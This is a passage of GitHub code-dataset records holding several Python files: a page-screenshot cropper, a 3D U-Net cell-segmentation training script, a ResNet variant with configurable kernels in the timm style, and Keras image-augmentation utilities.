save_path):\n    # in case the image isn't in the view yet\n    location = element.location_once_scrolled_into_view\n\n    # saves screenshot of entire page\n    chrome.save_screenshot(save_path)\n\n    # crop after in memory, using PIL\n    image = Image.open(save_path)\n    width = 1000\n    height = 1419\n    left = 700\n    bottom = height\n    image = image.crop((left, 0, left + width, height)) \n    image.save(save_path, 'png') # saves new cropped image\n\nif __name__ == '__main__':\n    fire.Fire()\n","repo_name":"emilybfrank/hathitrust-export","sub_path":"book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2332460469","text":"# import unet_dist2center as dc\n# import unet_3d_pixclass as u3\n# import unet_2d_pixclass as u2\n# import unet_ph3regress as ph3\n# import unet_dist2bg as bg\nfrom segtools.defaults.ipython_remote import *\nimport train_seg_lib as ts\nimport unet_3d_cele as ce\nsavedir = Path('training/ce_test6/'); savedir.mkdir(exist_ok=True);\n# homedir = 
Path('./')\n# loaddir = Path('training/ce_022/')\n# mypath_opt = savedir\nm = ce\n\n\ndef rm_if_exists_and_copy(p):\n p = Path(p)\n if (savedir / p).exists():\n os.remove(savedir / p)\n shutil.copy(p, savedir)\n\nif __name__ == '__main__':\n loaddir = Path(sys.argv[1])\n savedir = Path(sys.argv[2])\n mypath_opt = savedir\n print(\"loaddir, savedir\", loaddir, savedir)\n\n savedir.mkdir(exist_ok=True)\n # shutil.copy(__file__, savedir)\n for p in ['train_seg_lib.py', 'unet_3d_cele.py', 'unet_dist2center.py', 'unet_2d_pixclass.py', 'unet_3d_pixclass.py']:\n rm_if_exists_and_copy(p)\n\n\n# trials = m.optimize_seg_joint(savedir, max_evals=200)\nm.fig3pkl()\nsys.exit(0)\n\n\nif False:\n m.doitall(savedir)\n\nif False:\n imgdirs = [\"Fluo-N3DH-CE/01/\", \"Fluo-N3DH-CE/02/\", \"Fluo-N3DH-CE_challenge/01/\", \"Fluo-N3DH-CE_challenge/02/\"]\n pimgextensions = ['train1/', 'train2/', 'chall1/', 'chall2']\n # imgdirs = [\"Fluo-N3DH-CE/02/\", \"Fluo-N3DH-CE_challenge/01/\", \"Fluo-N3DH-CE_challenge/02/\"]\n # pimgextensions = ['train2/', 'chall1/', 'chall2']\n ws = [3,4,5,6]\n for i in range(len(pimgextensions)):\n # plt.figure()\n for t in range(29,31):\n imgdir = Path(imgdirs[i])\n pimgdir = Path(\"training/ce_{:03d}/train_cp/pimgs/\".format(t))\n extdir = pimgdir / pimgextensions[i]\n # cellcounts = eval((extdir / 'counts.txt').open().read())\n plt.plot([c[1] for c in cellcounts], label=str(ws[t-27]))\n zcolordir = extdir / 'zcolor'\n n = 250 if i == 0 else 190\n m.pimgs2movie(extdir, imgdir, zcolordir, range(0,n))\n watersheddir = extdir / 'watershed'\n savedir = watersheddir / 'movie'\n m.hyps2movie(watersheddir,imgdir,savedir,range(0,n))\n # plt.legend()\n # plt.title(pimgextensions[i])\n # plt.savefig(str(pimgdir / 'traj{:02d}.png'.format(ws[i])))\n\n sys.exit(0)\n\n## make pimgs\n\nif True:\n imgdirs = [\"Fluo-N3DH-CE/01/\", \"Fluo-N3DH-CE/02/\", \"Fluo-N3DH-CE_challenge/01/\", \"Fluo-N3DH-CE_challenge/02/\"]\n pimgextensions = ['train1/', 'train2/', 'chall1/', 'chall2']\n\n net = m.build_net((120,120,120,1), 2, activation='softmax')\n net.load_weights('training/ce_059/train_cp/epochs/w_match_0.935_132.h5')\n pimgdir = Path('training/ce_059/train_cp/pimgs/')\n m.save_pimgs(net, pimgdir/'train1', Path(imgdirs[0]), range(0,250)) #challenge=False,n=1)\n m.save_pimgs(net, pimgdir/'train2', Path(imgdirs[1]), range(0,250)) #challenge=False,n=2)\n m.save_pimgs(net, pimgdir/'chall1', Path(imgdirs[2]), range(0,190)) #challenge=True,n=1)\n m.save_pimgs(net, pimgdir/'chall2', Path(imgdirs[3]), range(0,190)) #challenge=True,n=2)\n\n print('success')\n sys.exit(0)\n\n## dist2bg model\n\nif False:\n # rawdata = m.build_rawdata(homedir)\n\n rawgt = pickle.load(open('training/ce_test/rawgt.pkl','rb'))\n\n net = m.build_net((120,120,120,1),1,activation='linear')\n\n # lod = np.array(m.revertdict(rawgt['gt']))\n # rawgt['train'] = m.invertdict(lod[[0,3,4]])\n # rawgt['vali'] = m.invertdict(lod[[1,2]])\n\n tg = m.datagen(rawgt['train'], targetname='target2')\n vg = m.datagen(rawgt['vali'], targetname='target2')\n\n traindir = savedir / 'train_d2bg/'\n traindir.mkdir(exist_ok=True)\n\n examples = [(x[0],y[0,...,:-1]) for (x,y) in itertools.islice(vg, 5)]\n hical = m.Histories(examples, traindir)\n\n history = ts.train_gen(net, tg, vg, traindir, n_epochs=80, steps_per_epoch=30, callbacks=[hical])\n ts.plot_history(history, start=0, savepath=traindir)\n net.load_weights(history['weightname'])\n\n pimg = m.predict(net, rawgt['vali']['source'], outchan=1)\n res = m.show_rawdata(rawgt['vali'],pimg,1)\n 
io.imsave(traindir / 'result.png', res)\n\n # m.optimize_seg_separate_net(net,homedir,savedir)\n\n print('success')\n sys.exit(0)\n\n## render movies from a pretrained classifier\n\nif False:\n # traindir = savedir / 'train_cp'; traindir.mkdir(exist_ok=True);\n # resultdir = traindir / 'results'; resultdir.mkdir(exist_ok=True);\n pimgdir = Path('training/ce_014/pimgs2/'); pimgdir.mkdir(exist_ok=True);\n # renderdir = pimgdir / 'figs'; renderdir.mkdir(exist_ok=True);\n\n net = m.build_net((120,120,120,1), 2, activation='softmax')\n net.load_weights('training/ce_012/train_cp/w001_final.h5')\n m.save_pimgs(net,pimgdir)\n # m.make_movie(net,renderdir,0,250)\n\n sys.exit(0)\n\n## train and evaluate classifier\n\nif True:\n traindir = savedir / 'train_cp/'; traindir.mkdir(exist_ok=True);\n resultdir = traindir / 'results/'; resultdir.mkdir(exist_ok=True);\n epochdir = traindir / 'epochs/'; epochdir.mkdir(exist_ok=True);\n pimgdir = traindir / 'pimgs/'; pimgdir.mkdir(exist_ok=True);\n\n rawdata = {'train':m.times2raw(range(0,195,10),1,homedir), 'vali':m.times2raw(range(5,195,10),1,homedir)}\n # rawdata = {'train':m.times2raw([185],1,homedir), 'vali':m.times2raw([155],1,homedir)}\n # rawdata = {'train':m.times2raw([40, 100],1,homedir), 'vali':m.times2raw([30, 105],1,homedir)}\n # rawdata = {'train':times2raw([10,20,50,100,150],1,homedir), 'vali':times2raw([25,105],1,homedir)}\n # rawdata = {'train':times2raw([10, 60, 140, 185],1,homedir), 'vali':times2raw([20, 75, 155, 175],1,homedir)}\n\n for i in [1,2,3]:\n res = m.show_rawdata(rawdata['vali'],i=i)\n io.imsave(traindir / 'rawdata_vali_{:02d}.png'.format(i), res)\n\n weights = np.array([1,1])\n weights[1] = 16.0\n weights = weights / weights.sum()\n weights = m.K.variable(weights)\n\n\n # net = m.build_net((120,120,120,1),2,activation='softmax',weights=weights)\n net = m.build_net((120,120,120,1),2,activation='softmax')\n\n tg = m.datagen(rawdata['train'])\n vg = m.datagen(rawdata['vali'])\n\n examples = [(x[0],y[0,...,:-1]) for (x,y) in itertools.islice(vg, 5)]\n hical = m.Histories(examples, epochdir, weights=weights)\n\n history = ts.train_gen(net, tg, vg, traindir, n_epochs=60, steps_per_epoch=20, callbacks=[hical])\n ts.plot_history(history, start=1, savepath=traindir)\n net.load_weights(history['weightname'])\n\n results = m.analyze_cpnet(net,rawdata,resultdir)\n pickle.dump(results, open(resultdir / 'results.pkl', 'wb'))\n\n rawgt = m.build_gt_rawdata(homedir)\n results_gt = m.analyze_cpnet(net,rawgt,resultdir)\n pickle.dump(results_gt, open(resultdir / 'results_gt.pkl', 'wb'))\n\n print('success')\n sys.exit(0)\n\n## analysis\n\nresults_gt = pickle.load(open(resultdir / 'results_gt.pkl', 'rb'))\ngtdata = m.labnames2imgs_cens(m.labnames(1),1)\nm.mk_hyps_compute_seg(gtdata, results_gt)\n\n## old training\n\nrawdata = m.build_rawdata(homedir)\n# pickle.dump(rawdata, open(savedir / 'rawdata.pkl','wb'))\ntrainable = m.build_trainable(rawdata)\nm.show_trainvali(trainable, savedir)\n\nnet = m.build_net(trainable)\nns = trainable['vali']['xs'].shape[0]\nns = floor(np.sqrt(ns))\n\ntraindir = savedir / 'train/'\ntraindir.mkdir()\nhical = m.Histories(trainable['vali']['xs'][::ns], trainable['vali']['ys'][::ns], traindir)\n\nhistory = ts.train(net, trainable, traindir, n_epochs=40, batchsize=1,callbacks=[hical])\nhistory = history.history\n# history = eval(open(loaddir / 'history.txt','r').read())\n\nts.plot_history(history, savedir)\nnet.load_weights(history['weightname'])\nm.predict_trainvali(net, trainable, savedir)\npimg = m.predict(net, 
rawdata['vali']['source'])\nnp.save(savedir / 'pimg', pimg)\n\nsys.exit(0)\n# m.show_trainvali(trainable, savepath=savedir)\n\n## train net and plot trajectories\n\nsavedir = savedir / \"remove\"\nval_losses = []\nfor i in range(10):\n    trainable = m.build_trainable(rawdata)\n    savedir = savedir.parent / \"t{:03d}\".format(i)\n    savedir.mkdir(exist_ok=True)\n    net = m.build_net(trainable)\n    # net.load_weights('training/ph3_009/t000/w001.h5')\n    traindir = savedir / 'epochs'\n    traindir.mkdir()\n    history = ts.train(net, trainable, traindir, n_epochs=150, batchsize=1)\n    history = history.history\n    best_val = min(history['val_loss'])\n    val_losses.append(best_val)\n    print(\"HISTORY: \", i, \" \", best_val)\n    ts.plot_history(history, savedir)\n    m.predict_trainvali(net, trainable, savedir)\n    json.dump(history, open(savedir / 'history.json', 'w'), indent=2, cls=NumpyEncoder)\n\nsavedir = savedir.parent\n\nprint(\"best validation losses:\", val_losses, file=open(savedir/'val_losses.txt','w'))\nidx_best = np.argmin(val_losses)\nprint(\"idx_best\", idx_best)\n\n## load weights after network optimization and view results\n\nnet.load_weights(str(loaddir / \"t{:03d}/w001.h5\".format(idx_best)))\nm.predict_trainvali(net, trainable, savedir)\npimg = m.predict(net, rawdata['img'], trainable['xsem'], trainable['ysem'])\nnp.save(savedir / 'pimg', pimg)\n\nm.show_results(pimg, rawdata, trainable, savepath=savedir)\n\n# ts.max_z_divchan(pimg, savedir)\n# ts.show_results(pimg, rawdata, savedir)\n# ts.find_divisions(pimg, savedir)\n\n## optimize the segmentation\n\nsegparams = ts.segparams()\ngt_patches = dict()\ngt_patches['gt_slices'] = rawdata['gt_slices'][:-4]\ngt_patches['inds_labeled_slices'] = rawdata['inds_labeled_slices'][:, :-4]\nbest = ts.optimize_segmentation(pimg[[0]], {**rawdata, **gt_patches}, segparams, mypath_opt)\nhyp = np.array([segparams['function'](x, best) for x in pimg])\nseg_scores = ts.compute_seg_on_slices(hyp, rawdata)\nprint(seg_scores)\nts.analyze_hyp(hyp, rawdata, segparams, savedir)\nnhls = ts.build_nhl(hyp, rawdata, savedir)\ntr = ts.track_nhls(nhls, savedir)\n\nhistory = \"\"\"\n\n## Mon Jul 30 00:35:38 2018\n\nRecently added loop over training.\nNow regen training data and retrain model each iteration.\nBUGFIX. now we should be able to train multiple models and predict from best.\n\n3 deep 16 starting features 5 conv-width gives by far the best results.\nchose best over ten models trained. The variability of the best val loss is large!\nseg is 0.805 ! 
best so far.\n\n*Does the variability come from the train/vali split, model initialization or SGD?*\n\n\n\n\"\"\"","repo_name":"colemanbroad/fisheye","sub_path":"src/trainseg_ipy.py","file_name":"trainseg_ipy.py","file_ext":"py","file_size_in_byte":9974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20245280759","text":"import math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom timm.data import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD\nfrom .helpers import build_model_with_cfg\nfrom .layers import DropBlock2d, DropPath, AvgPool2dSame, BlurPool2d, create_attn, create_classifier\nfrom .registry import register_model\n\n__all__ = ['ResNet', 'BasicBlock', 'Bottleneck'] # model_registry will add each entrypoint fn to this\n\n\ndef _mcfg(**kwargs):\n cfg = dict()\n cfg.update(**kwargs)\n return cfg\n\n\n# Model FLOPS = three trailing digits * 10^8\nmodel_cfgs = dict(\n resnet18_hil=_mcfg(kernel_size=(3, 3), padding=(1, 1)),\n resnet34_hil=_mcfg(kernel_size=(3, 3), padding=(1, 1)),\n resnet26_hil=_mcfg(kernel_size=(3, 3), padding=(1, 1)),\n resnet50_hil=_mcfg(kernel_size=(3, 3), padding=(1, 1)),\n resnet101_hil=_mcfg(kernel_size=(3, 3), padding=(1, 1)),\n resnet152_hil=_mcfg(kernel_size=(3, 3), padding=(1, 1)),\n resnet200_hil=_mcfg(kernel_size=(3, 3), padding=(1, 1)),\n resnet50_3x1_hil=_mcfg(kernel_size=(3, 1), padding=(1, 0)),\n)\n\ndef _cfg(url='', **kwargs):\n return {\n 'url': url,\n 'num_classes': 1000, 'input_size': (3, 224, 224), 'pool_size': (7, 7),\n 'crop_pct': 0.875, 'interpolation': 'bilinear',\n 'mean': IMAGENET_DEFAULT_MEAN, 'std': IMAGENET_DEFAULT_STD,\n 'first_conv': 'conv1', 'classifier': 'fc',\n **kwargs\n }\n\n\ndefault_cfgs = {\n # ResNet and Wide ResNet\n 'resnet18_hil': _cfg(url=''),\n 'resnet34_hil': _cfg(url=''),\n 'resnet26_hil': _cfg(url='', interpolation='bicubic'),\n 'resnet50_hil': _cfg(url='', interpolation='bicubic'),\n 'resnet101_hil': _cfg(url='', interpolation='bicubic'),\n 'resnet152_hil': _cfg(url='', interpolation='bicubic'),\n 'resnet200_hil': _cfg(url='', interpolation='bicubic'),\n\n 'resnet50_3x1_hil': _cfg(url='', interpolation='bicubic', kernel_size=(3, 1), padding=(1, 0)),\n}\n\n\ndef get_padding(kernel_size, stride, dilation=1):\n padding = ((stride - 1) + dilation * (kernel_size - 1)) // 2\n return padding\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, cfg, inplanes, planes, stride=1, downsample=None, cardinality=1, base_width=64,\n reduce_first=1, dilation=1, first_dilation=None, act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d,\n attn_layer=None, aa_layer=None, drop_block=None, drop_path=None):\n super(BasicBlock, self).__init__()\n\n assert cardinality == 1, 'BasicBlock only supports cardinality of 1'\n assert base_width == 64, 'BasicBlock does not support changing base width'\n first_planes = planes // reduce_first\n outplanes = planes * self.expansion\n first_dilation = first_dilation or dilation\n use_aa = aa_layer is not None and (stride == 2 or first_dilation != dilation)\n\n self.conv1 = nn.Conv2d(\n inplanes, first_planes, kernel_size=cfg['kernel_size'], stride=1 if use_aa else stride, padding=cfg['padding'],\n dilation=first_dilation, bias=False)\n self.bn1 = norm_layer(first_planes)\n self.act1 = act_layer(inplace=True)\n self.aa = aa_layer(channels=first_planes, stride=stride) if use_aa else None\n\n self.conv2 = nn.Conv2d(\n first_planes, outplanes, kernel_size=cfg['kernel_size'], padding=cfg['padding'], 
dilation=dilation, bias=False)\n self.bn2 = norm_layer(outplanes)\n\n self.se = create_attn(attn_layer, outplanes)\n\n self.act2 = act_layer(inplace=True)\n self.downsample = downsample\n self.stride = stride\n self.dilation = dilation\n self.drop_block = drop_block\n self.drop_path = drop_path\n\n def zero_init_last_bn(self):\n nn.init.zeros_(self.bn2.weight)\n\n def forward(self, x):\n residual = x\n\n x = self.conv1(x)\n x = self.bn1(x)\n if self.drop_block is not None:\n x = self.drop_block(x)\n x = self.act1(x)\n if self.aa is not None:\n x = self.aa(x)\n\n x = self.conv2(x)\n x = self.bn2(x)\n if self.drop_block is not None:\n x = self.drop_block(x)\n\n if self.se is not None:\n x = self.se(x)\n\n if self.drop_path is not None:\n x = self.drop_path(x)\n\n if self.downsample is not None:\n residual = self.downsample(residual)\n x += residual\n x = self.act2(x)\n\n return x\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, cfg, inplanes, planes, stride=1, downsample=None, cardinality=1, base_width=64,\n reduce_first=1, dilation=1, first_dilation=None, act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d,\n attn_layer=None, aa_layer=None, drop_block=None, drop_path=None):\n super(Bottleneck, self).__init__()\n\n width = int(math.floor(planes * (base_width / 64)) * cardinality)\n first_planes = width // reduce_first\n outplanes = planes * self.expansion\n first_dilation = first_dilation or dilation\n use_aa = aa_layer is not None and (stride == 2 or first_dilation != dilation)\n\n self.conv1 = nn.Conv2d(inplanes, first_planes, kernel_size=1, bias=False)\n self.bn1 = norm_layer(first_planes)\n self.act1 = act_layer(inplace=True)\n\n self.conv2 = nn.Conv2d(\n first_planes, width, kernel_size=cfg['kernel_size'], stride=1 if use_aa else stride,\n padding=cfg['padding'], dilation=first_dilation, groups=cardinality, bias=False)\n self.bn2 = norm_layer(width)\n self.act2 = act_layer(inplace=True)\n self.aa = aa_layer(channels=width, stride=stride) if use_aa else None\n\n self.conv3 = nn.Conv2d(width, outplanes, kernel_size=1, bias=False)\n self.bn3 = norm_layer(outplanes)\n\n self.se = create_attn(attn_layer, outplanes)\n\n self.act3 = act_layer(inplace=True)\n self.downsample = downsample\n self.stride = stride\n self.dilation = dilation\n self.drop_block = drop_block\n self.drop_path = drop_path\n\n def zero_init_last_bn(self):\n nn.init.zeros_(self.bn3.weight)\n\n def forward(self, x):\n residual = x\n\n x = self.conv1(x)\n x = self.bn1(x)\n if self.drop_block is not None:\n x = self.drop_block(x)\n x = self.act1(x)\n\n x = self.conv2(x)\n x = self.bn2(x)\n if self.drop_block is not None:\n x = self.drop_block(x)\n x = self.act2(x)\n if self.aa is not None:\n x = self.aa(x)\n\n x = self.conv3(x)\n x = self.bn3(x)\n if self.drop_block is not None:\n x = self.drop_block(x)\n\n if self.se is not None:\n x = self.se(x)\n\n if self.drop_path is not None:\n x = self.drop_path(x)\n\n if self.downsample is not None:\n residual = self.downsample(residual)\n x += residual\n x = self.act3(x)\n\n return x\n\n\ndef downsample_conv(\n in_channels, out_channels, kernel_size, stride=1, dilation=1, first_dilation=None, norm_layer=None):\n norm_layer = norm_layer or nn.BatchNorm2d\n kernel_size = 1 if stride == 1 and dilation == 1 else kernel_size\n first_dilation = (first_dilation or dilation) if kernel_size > 1 else 1\n p = get_padding(kernel_size, stride, first_dilation)\n\n return nn.Sequential(*[\n nn.Conv2d(\n in_channels, out_channels, kernel_size, stride=stride, padding=p, 
dilation=first_dilation, bias=False),\n norm_layer(out_channels)\n ])\n\n\ndef downsample_avg(\n in_channels, out_channels, kernel_size, stride=1, dilation=1, first_dilation=None, norm_layer=None):\n norm_layer = norm_layer or nn.BatchNorm2d\n avg_stride = stride if dilation == 1 else 1\n if stride == 1 and dilation == 1:\n pool = nn.Identity()\n else:\n avg_pool_fn = AvgPool2dSame if avg_stride == 1 and dilation > 1 else nn.AvgPool2d\n pool = avg_pool_fn(2, avg_stride, ceil_mode=True, count_include_pad=False)\n\n return nn.Sequential(*[\n pool,\n nn.Conv2d(in_channels, out_channels, 1, stride=1, padding=0, bias=False),\n norm_layer(out_channels)\n ])\n\n\ndef drop_blocks(drop_block_rate=0.):\n return [\n None, None,\n DropBlock2d(drop_block_rate, 5, 0.25) if drop_block_rate else None,\n DropBlock2d(drop_block_rate, 3, 1.00) if drop_block_rate else None]\n\n\ndef make_blocks(\n cfg, block_fn, channels, block_repeats, inplanes, reduce_first=1, output_stride=32,\n down_kernel_size=1, avg_down=False, drop_block_rate=0., drop_path_rate=0., **kwargs):\n stages = []\n feature_info = []\n net_num_blocks = sum(block_repeats)\n net_block_idx = 0\n net_stride = 4\n dilation = prev_dilation = 1\n for stage_idx, (planes, num_blocks, db) in enumerate(zip(channels, block_repeats, drop_blocks(drop_block_rate))):\n stage_name = f'layer{stage_idx + 1}' # never liked this name, but weight compat requires it\n stride = 1 if stage_idx == 0 else 2\n if net_stride >= output_stride:\n dilation *= stride\n stride = 1\n else:\n net_stride *= stride\n\n downsample = None\n if stride != 1 or inplanes != planes * block_fn.expansion:\n down_kwargs = dict(\n in_channels=inplanes, out_channels=planes * block_fn.expansion, kernel_size=down_kernel_size,\n stride=stride, dilation=dilation, first_dilation=prev_dilation, norm_layer=kwargs.get('norm_layer'))\n downsample = downsample_avg(**down_kwargs) if avg_down else downsample_conv(**down_kwargs)\n\n block_kwargs = dict(reduce_first=reduce_first, dilation=dilation, drop_block=db, **kwargs)\n blocks = []\n for block_idx in range(num_blocks):\n downsample = downsample if block_idx == 0 else None\n stride = stride if block_idx == 0 else 1\n block_dpr = drop_path_rate * net_block_idx / (net_num_blocks - 1) # stochastic depth linear decay rule\n blocks.append(block_fn(cfg, inplanes, planes, stride, downsample, first_dilation=prev_dilation,\n drop_path=DropPath(block_dpr) if block_dpr > 0. 
else None, **block_kwargs))\n prev_dilation = dilation\n inplanes = planes * block_fn.expansion\n net_block_idx += 1\n\n stages.append((stage_name, nn.Sequential(*blocks)))\n feature_info.append(dict(num_chs=inplanes, reduction=net_stride, module=stage_name))\n\n return stages, feature_info\n\n\nclass ResNet(nn.Module):\n\n def __init__(self, cfg, block, layers, num_classes=1000, in_chans=3,\n cardinality=1, base_width=64, stem_width=64, stem_type='',\n output_stride=32, block_reduce_first=1, down_kernel_size=1, avg_down=False,\n act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d, aa_layer=None, drop_rate=0.0, drop_path_rate=0.,\n drop_block_rate=0., global_pool='avg', zero_init_last_bn=True, block_args=None):\n block_args = block_args or dict()\n assert output_stride in (8, 16, 32)\n self.num_classes = num_classes\n self.drop_rate = drop_rate\n super(ResNet, self).__init__()\n\n inplanes = 64\n # self.conv1 = nn.Conv2d(in_chans, inplanes, kernel_size=7, stride=2, padding=3, bias=False)\n self.conv1 = nn.Sequential(*[nn.Conv2d(in_chans, inplanes, kernel_size=cfg['kernel_size'], stride=2, padding=cfg['padding'], bias=False),\n norm_layer(inplanes),\n act_layer(inplace=True),\n nn.Conv2d(inplanes, inplanes, kernel_size=cfg['kernel_size'], stride=1, padding=cfg['padding'], bias=False),\n norm_layer(inplanes),\n act_layer(inplace=True),\n nn.Conv2d(inplanes, inplanes, kernel_size=cfg['kernel_size'], stride=1, padding=cfg['padding'], bias=False),\n ])\n self.bn1 = norm_layer(inplanes)\n self.act1 = act_layer(inplace=True)\n self.feature_info = [dict(num_chs=inplanes, reduction=2, module='act1')]\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n\n # Feature Blocks\n channels = [64, 128, 256, 512]\n stage_modules, stage_feature_info = make_blocks(\n cfg, block, channels, layers, inplanes, cardinality=cardinality, base_width=base_width,\n output_stride=output_stride, reduce_first=block_reduce_first, avg_down=avg_down,\n down_kernel_size=down_kernel_size, act_layer=act_layer, norm_layer=norm_layer, aa_layer=aa_layer,\n drop_block_rate=drop_block_rate, drop_path_rate=drop_path_rate, **block_args)\n for stage in stage_modules:\n self.add_module(*stage) # layer1, layer2, etc\n self.feature_info.extend(stage_feature_info)\n\n # Head (Pooling and Classifier)\n self.num_features = 512 * block.expansion\n self.global_pool, self.fc = create_classifier(self.num_features, self.num_classes, pool_type=global_pool)\n\n for n, m in self.named_modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.)\n nn.init.constant_(m.bias, 0.)\n if zero_init_last_bn:\n for m in self.modules():\n if hasattr(m, 'zero_init_last_bn'):\n m.zero_init_last_bn()\n\n def get_classifier(self):\n return self.fc\n\n def reset_classifier(self, num_classes, global_pool='avg'):\n self.num_classes = num_classes\n self.global_pool, self.fc = create_classifier(self.num_features, self.num_classes, pool_type=global_pool)\n\n def forward_features(self, x):\n x = self.conv1(x) # torch.Size([2, 3, 224, 224]) -> torch.Size([2, 64, 112, 112])\n x = self.bn1(x) # torch.Size([2, 64, 112, 112]) -> torch.Size([2, 64, 112, 112])\n x = self.act1(x) # torch.Size([2, 64, 112, 112]) -> torch.Size([2, 64, 112, 112])\n x = self.maxpool(x) # torch.Size([2, 64, 112, 112]) -> torch.Size([2, 64, 56, 56])\n\n x = self.layer1(x) # torch.Size([2, 64, 56, 56]) -> torch.Size([2, 256, 56, 56])\n x = self.layer2(x) # torch.Size([2, 
256, 56, 56]) -> torch.Size([2, 512, 28, 28])\n        x = self.layer3(x) # torch.Size([2, 512, 28, 28]) -> torch.Size([2, 1024, 14, 14])\n        x = self.layer4(x) # torch.Size([2, 1024, 14, 14]) -> torch.Size([2, 2048, 7, 7])\n        return x\n\n    def forward(self, x):\n        x = self.forward_features(x) # torch.Size([2, 2048, 7, 7])\n        x = self.global_pool(x) # torch.Size([2, 2048, 7, 7]) -> torch.Size([2, 2048])\n        if self.drop_rate:\n            x = F.dropout(x, p=float(self.drop_rate), training=self.training)\n        x = self.fc(x)\n        return x\n\n\ndef _create_resnet(variant, pretrained=False, **kwargs):\n    return build_model_with_cfg(ResNet, variant, pretrained, default_cfg=default_cfgs[variant], model_cfg=model_cfgs[variant], **kwargs)\n\n\n@register_model\ndef resnet18_hil(pretrained=False, **kwargs):\n    \"\"\"Constructs a ResNet-18 model.\n    \"\"\"\n    model_args = dict(block=BasicBlock, layers=[2, 2, 2, 2], **kwargs)\n    return _create_resnet('resnet18_hil', pretrained, **model_args)\n\n\n@register_model\ndef resnet34_hil(pretrained=False, **kwargs):\n    \"\"\"Constructs a ResNet-34 model.\n    \"\"\"\n    model_args = dict(block=BasicBlock, layers=[3, 4, 6, 3], **kwargs)\n    return _create_resnet('resnet34_hil', pretrained, **model_args)\n\n\n@register_model\ndef resnet26_hil(pretrained=False, **kwargs):\n    \"\"\"Constructs a ResNet-26 model.\n    \"\"\"\n    model_args = dict(block=Bottleneck, layers=[2, 2, 2, 2], **kwargs)\n    return _create_resnet('resnet26_hil', pretrained, **model_args)\n\n\n@register_model\ndef resnet50_hil(pretrained=False, **kwargs):\n    \"\"\"Constructs a ResNet-50 model.\n    \"\"\"\n    model_args = dict(block=Bottleneck, layers=[3, 4, 6, 3], **kwargs)\n    return _create_resnet('resnet50_hil', pretrained, **model_args)\n\n\n@register_model\ndef resnet101_hil(pretrained=False, **kwargs):\n    \"\"\"Constructs a ResNet-101 model.\n    \"\"\"\n    model_args = dict(block=Bottleneck, layers=[3, 4, 23, 3], **kwargs)\n    return _create_resnet('resnet101_hil', pretrained, **model_args)\n\n\n@register_model\ndef resnet152_hil(pretrained=False, **kwargs):\n    \"\"\"Constructs a ResNet-152 model.\n    \"\"\"\n    model_args = dict(block=Bottleneck, layers=[3, 8, 36, 3], **kwargs)\n    return _create_resnet('resnet152_hil', pretrained, **model_args)\n\n\n@register_model\ndef resnet200_hil(pretrained=False, **kwargs):\n    \"\"\"Constructs a ResNet-200 model.\n    \"\"\"\n    model_args = dict(block=Bottleneck, layers=[3, 24, 36, 3], **kwargs)\n    return _create_resnet('resnet200_hil', pretrained, **model_args)\n\n\n@register_model\ndef resnet50_3x1_hil(pretrained=False, **kwargs):\n    \"\"\"Constructs a ResNet-50 model.\n    \"\"\"\n    model_args = dict(block=Bottleneck, layers=[3, 4, 6, 3], **kwargs)\n    return _create_resnet('resnet50_3x1_hil', pretrained, **model_args)\n","repo_name":"TencentYoutuResearch/BaseArchitecture-EAT","sub_path":"timm/models/resnet_hilbert.py","file_name":"resnet_hilbert.py","file_ext":"py","file_size_in_byte":17237,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"27276069381","text":"# Utilities.py\n# Various functions for the Image Classification demonstration with Keras\n# Dr. 
Matthew Smith, SUT, ADACS/CAS\n\nfrom keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nimport numpy as np\n\n\ndef swish(x):\n\t# The swish activation function, f(x) = x * sigmoid(beta*x)\n\t# Not currently used, but you *might* want to.\n\tbeta = 1.5\n\treturn x*np.exp(beta*x)/(np.exp(beta*x)+1)\n\ndef Preview_Image_Generator(flip_mode):\n\t# This function is designed to give us a feel for the behaviour\n\t# of the imagedatagenerator function shipped with Keras.\n\t# It will augment the data contained in 0.jpg (cats, 'cause cats are cool)\n\t# and produce variations of this image, saved in ./preview\n\tdatagen = ImageDataGenerator(rotation_range=40,width_shift_range=0.2, height_shift_range=0.2,\n\t\tshear_range=0.2, zoom_range=0.2,horizontal_flip=flip_mode,fill_mode='nearest')\n\n\timg = load_img('./train/cats/0.jpg') # Work with image 0 to start with\n\tx = img_to_array(img) # this is a Numpy array with shape (3, 150, 150)\n\tx = x.reshape((1,) + x.shape) # this is a Numpy array with shape (1, 3, 150, 150)\n\n\t# the .flow() command below generates batches of randomly transformed images\n\t# and saves the results to the `preview/` directory\n\ti = 0\n\tfor batch in datagen.flow(x, batch_size=1, save_to_dir='preview', save_prefix='cat', save_format='jpeg'):\n\t\ti += 1\n\t\tif i > 20:\n\t\t\tbreak # otherwise the generator would loop indefinitely\n\n\treturn 0\n\n\ndef Prepare_Image_Data(shear, zoom, flip_mode, test_flag):\n\t# Decide what features to use in ImageDataGenerator depending on\n\t# whether or not we are training or testing.\n\tif (test_flag == False):\n\t\t# Training data - will employ data augmentation, so can flip, zoom, shear etc.\n\t\t# Normalise the RGB data to between 0 and 1\n\t\tdatagen = ImageDataGenerator(rescale=1.0/255.0,\n\t\t\tshear_range = shear, zoom_range = zoom, horizontal_flip = flip_mode)\n\telse:\n\t\t# We don't need to augment the test data set - no reason to shift, zoom or flip.\n\t\t# Still need to rescale, though, since training employed normalisation.\n\t\tdatagen = ImageDataGenerator(rescale=1.0/255.0)\n\n\treturn 